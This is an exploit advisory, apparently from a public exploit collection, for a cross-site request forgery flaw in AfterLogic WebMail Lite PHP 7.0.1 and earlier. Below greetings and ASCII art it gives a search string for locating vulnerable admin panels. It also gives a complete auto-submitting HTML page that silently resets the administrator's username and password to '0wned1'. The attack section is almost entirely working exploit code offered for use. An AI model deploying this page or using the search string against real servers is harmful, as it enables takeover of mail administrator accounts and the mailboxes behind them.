1.
#########################################################################
2.
3. [+] Exploit Title : AfterLogic WebMail Lite PHP CSRF
4. [+] Author : Pablo '7days' Riberio
5. [+] Team: So Good Security
6. [+] Other 0days : http://pastebin.com/u/7days
7. [+] Version : <= 7.0.1
8. [+] Tested on : windows/internet explorer
9. [+] Details: Reset admin password via CSRF
10. [+] Vendor: http://www.afterlogic.org/
11. [+] Duck : inurl:webmail/adminpanel/index.php?submit
12.
#########################################################################
13.
14.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
15. Gr33tz: Greg, Sonya from Mortal Kombat, the owner of the japanese
steak creation factory,
16. my home boy linus, all the cockneys and my grandma <3
17.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
18. no thnx 2: microsoft, windoz, estate agents, all the script kiddies
and recruiters
19.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
20. `..`.:::.`
21. .://o:::///:.
22. `::+y+::::::/+/`
23. :/++/::/:/--:+o:`
24. `://:-:/-/:.-:/oo.
25. `/-.-:::/o---::+o.
26. ....-:/+hs::--:+o
27. .``-//ohh+----:+.
28. `.``-/+syhs:----/+`
29. .-.`.-:+syyo:--.-:+/
30. `---.`.-/+yo/:-----:+o.
31. .::-...-:+/o/-.-----:+so`
32. .-::-...-:::::-----:://osy:
33. .::-....--:::----::/+ooosys-
34. `:--.....-:/:::::/+osyyyyo:`
35. ` `----...--:/++++oosyyhhy+-`
36. :::::-------:::---..--:/+oossyyhhhhs/.
37. ::::::-------:--.-.--:+osyyyhhhhho-`
38. ------------.....--:/+oyyhhhhhy+.
39. -----------...---:/+osyhhhhyo:`
40. :::::-------:::/+osyyhhhhs/.
41. ++++++++++++oossyyhhhhs/.
42. sssssssyyyyhhhhhhhyo:.`
43. ``..---..`
44.
45. portuguese cyber army
46.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
47. [+] Begin 0day
48.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
49.
50. <html>
51. <head>
52. </head>
53. <body>
54. <!-- AfterLogic WebMail Lite PHP 7.0.1 csrf -->
55. <form action="
http://www.victim.com/webmail/adminpanel/index.php?submit" method="POST"
id="csrf" name="csrf" οnlοad="go()">
56. <input type="hidden" name="form_id" value="security" />
57. <input type="hidden" name="txtUserName" value="0wned1" />
58. <input type="hidden" name="txtNewPassword" value="0wned1" />
59. <input type="hidden" name="txtConfirmNewPassword"
value="0wned1" />
60. <input type="submit" name="submit_btn" value="Save" />
61. </form>
62. <script language="JavaScript" type="text/javascript">
63. document.csrf.submit();
64. </script>
65. </body>
66.
67. </html>
68.
69.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
70. [+] End 0day
71.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-